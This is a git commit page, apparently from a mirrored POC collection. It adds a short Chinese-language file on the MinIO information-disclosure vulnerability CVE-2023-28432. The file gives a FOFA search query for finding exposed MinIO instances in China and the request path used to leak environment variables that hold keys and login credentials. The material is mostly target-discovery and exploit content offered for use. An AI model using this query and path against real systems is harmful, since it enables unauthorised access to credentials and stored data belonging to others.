mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 15:35:34 +08:00
6.5更新漏洞
This commit is contained in:
17
Minio-verify信息泄露(CVE-2023-28432).md
Normal file
17
Minio-verify信息泄露(CVE-2023-28432).md
Normal file
@@ -0,0 +1,17 @@
|
||||
## Minio-verify信息泄露(CVE-2023-28432)
|
||||
|
||||
MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
(banner="MinIO" || header="MinIO" || title="MinIO Browser") && country="CN"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
/minio/bootstrap/v1/verify
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user